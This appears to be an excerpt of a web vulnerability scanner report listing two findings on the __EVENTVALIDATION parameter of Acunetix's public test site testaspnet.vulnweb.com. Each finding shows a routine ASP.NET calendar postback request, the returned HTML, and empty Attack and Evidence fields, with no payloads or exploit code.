Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8131&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAsWRgF9oIZGRkorKzqq4z40e3iIGpZwyRRLgItT0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKH5%2BHnDQKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDFAWpxKlISdBx4eGseGyivlIHFpk
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:57 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAsWRgF9oIZGRkorKzqq4z40e3iIGpZwyRRLgItT0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKH5+HnDQKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDFAWpxKlISdBx4eGseGyivlIHFpk" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:White" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1159 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,159 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8269&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAs0HRg9oIZGRksxFQ6Cc4IMpKu8ZZ6%2BFSzgHEYcQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKh5fGTBQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DsrKEmhpjVYtKrroLwAFKixOZKAE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:41:11 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAs0HRg9oIZGRksxFQ6Cc4IMpKu8ZZ6+FSzgHEYcQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKh5fGTBQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DsrKEmhpjVYtKrroLwAFKixOZKAE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:White" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
